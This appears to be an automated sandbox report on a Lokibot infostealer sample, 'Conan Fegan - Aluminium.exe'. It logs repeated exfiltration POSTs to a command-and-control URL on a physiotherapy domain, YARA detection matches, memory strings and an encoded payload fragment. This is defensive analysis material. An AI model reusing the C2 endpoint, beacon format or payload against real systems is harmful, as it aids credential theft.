                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_00404ED4 recv,
                  Source: unknownDNS traffic detected: queries for: www.ritcophysiotherapy.com.au
                  Source: unknownHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 190Connection: close
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 22 Feb 2021 18:13:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.2.34Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.638473832.0000000005B8D000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.650636211.0000000005B50000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.650636211.0000000005B50000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comionF
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.650636211.0000000005B50000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.commi
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.635133696.0000000005B6B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.635133696.0000000005B6B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comc
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.636344129.0000000005B57000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.636630818.0000000005B56000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.636508473.0000000005B58000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/;
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.636508473.0000000005B58000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn9
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.636140982.0000000005B5E000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnFk
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.636508473.0000000005B58000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnO
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.636344129.0000000005B57000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cng
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.650636211.0000000005B50000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm-
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: Conan Fegan - Aluminium.exe, Conan Fegan - Aluminium.exe, 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.634766145.0000000005B53000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.634766145.0000000005B53000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.coma
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
                  Source: Conan Fegan - Aluminium.exe, 00000005.00000002.900851249.000000000049F000.00000040.00000001.sdmpString found in binary or memory: https://www.ritcophysiotherapy.com.au/wap121/five/fre.php

                  System Summary:

                  barindex
                  Malicious sample detected (through community Yara rule)Show sources
                  Source: 00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                  Source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.Conan Fegan - Aluminium.exe.3e3d4e0.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.Conan Fegan - Aluminium.exe.3e3d4e0.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 5.2.Conan Fegan - Aluminium.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 5.2.Conan Fegan - Aluminium.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 5.2.Conan Fegan - Aluminium.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 5.2.Conan Fegan - Aluminium.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.Conan Fegan - Aluminium.exe.2d63264.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.Conan Fegan - Aluminium.exe.2d63264.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.Conan Fegan - Aluminium.exe.3dfbac0.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.Conan Fegan - Aluminium.exe.3dfbac0.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  .NET source code contains very large stringsShow sources
                  Source: Conan Fegan - Aluminium.exe, frmlogin.csLong String: Length: 13656
                  Source: 0.2.Conan Fegan - Aluminium.exe.960000.0.unpack, frmlogin.csLong String: Length: 13656
                  Source: 0.0.Conan Fegan - Aluminium.exe.960000.0.unpack, frmlogin.csLong String: Length: 13656
                  Source: 5.2.Conan Fegan - Aluminium.exe.c20000.1.unpack, frmlogin.csLong String: Length: 13656
                  Source: 5.0.Conan Fegan - Aluminium.exe.c20000.0.unpack, frmlogin.csLong String: Length: 13656
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_00969526
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_0096B3F4
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_0096A47C
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_07A38DF8
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_07A30040
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_07A30D80
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_07A38DEA
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_07A3C5FF
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_07A38417
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_07A32BC7
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_07A32BD8
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_07A34190
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_0040549C
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_004029D4
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_00C2A47C
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_00C29526
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_00C2B3F4
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: String function: 0041219C appears 45 times
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: String function: 00405B6F appears 42 times
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.654833481.00000000077B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Conan Fegan - Aluminium.exe
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.654938639.00000000079A0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLegacyPathHandling.dllN vs Conan Fegan - Aluminium.exe
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.650852695.00000000009C4000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCallConvCdecl.exe4 vs Conan Fegan - Aluminium.exe
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAsyncState.dllF vs Conan Fegan - Aluminium.exe
                  Source: Conan Fegan - Aluminium.exe, 00000005.00000002.900934959.0000000000C84000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCallConvCdecl.exe4 vs Conan Fegan - Aluminium.exe
                  Source: Conan Fegan - Aluminium.exeBinary or memory string: OriginalFilenameCallConvCdecl.exe4 vs Conan Fegan - Aluminium.exe
                  Source: Conan Fegan - Aluminium.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: 00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.Conan Fegan - Aluminium.exe.3e3d4e0.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.Conan Fegan - Aluminium.exe.3e3d4e0.2.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 5.2.Conan Fegan - Aluminium.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 5.2.Conan Fegan - Aluminium.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 5.2.Conan Fegan - Aluminium.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 5.2.Conan Fegan - Aluminium.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.Conan Fegan - Aluminium.exe.2d63264.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
                  Source: 0.2.Conan Fegan - Aluminium.exe.2d63264.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.Conan Fegan - Aluminium.exe.2d63264.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.Conan Fegan - Aluminium.exe.3dfbac0.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.Conan Fegan - Aluminium.exe.3dfbac0.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: Conan Fegan - Aluminium.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: Conan Fegan - Aluminium.exe, frmlogin.csBase64 encoded string: 'GIdDNNZNNNNRNNNN//8NNYtNNNNNNNNNDNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNtNNNNN4sht4NgNaAVotOGZ0uITucplOjpz9apzSgVTAuoz5iqPOvMFOlqJ4tnJ4tER9GVT1iMTHhQD0XWNNNNNNNNNODEDNNGNRQNViu868NNNNNNNNNNBNNNvRYNINNNPNNNNNTNNNNNNNNlw8NNNNtNNNNDNNNNNNNRDNtNNNNNtNNONNNNNNNNNNRNNNNNNNNNNPNNNNNNtNNNNNNNNZNDVHNNONNNONNNNNNRNNNRNNNNNNNNONNNNNNNNNNNNNNNUt/NNOCNNNNNRNNNBDQNNNNNNNNNNNNNNNNNNNNNNNNNTNNNNjNNNOpCjNNUNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNVNNNPNNNNNNNNNNNNNNNPPNNNRtNNNNNNNNNNNNNNP50MKu0NNNN0O8NNNNtNNNNVNNNNNVNNNNNNNNNNNNNNNNNNPNNNTNhpaAlLjNNNBDQNNNNDNNNNNDNNNNvNNNNNNNNNNNNNNNNNNONNNONYaWyoT9wNNNZNNNNNTNNNNNPNNNNWtNNNNNNNNNNNNNNNNNNDNNNDtNNNNNNNNNNNNNNNNNNNNPfCjNNNNNNNRtNNNNPNNHNhPHNNBjLNNNQNNNNNNNNNXD+NNP4NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNO4PXOLNNNbdWtNPXOpNNNbNXdMmTNNNPbNONNNRpkxNNNdNNtNNOUZnNNNXtNZNNNEmTjNNPbNRNNNRXuZjNDNDNNNNNDNNRDO+NDNNOT8pNNNXPvfNOvbGZNRNRNNNNNVNNORNstVNNNEiUDNNPtbeNNLdRmNONONNNNNQNNNENU4QNNNRok4NNNbXXjNTXuZjNDNDNNNNONNNRDO+ONNNOT8sNNNXPvfNOvbGZNVNCNNNNNHNNORNstHNNNDHXPNNNNbYOljuptRNNUQDODNNNvtuNNNXolVNNNcmVjNNPtjVtNHNNND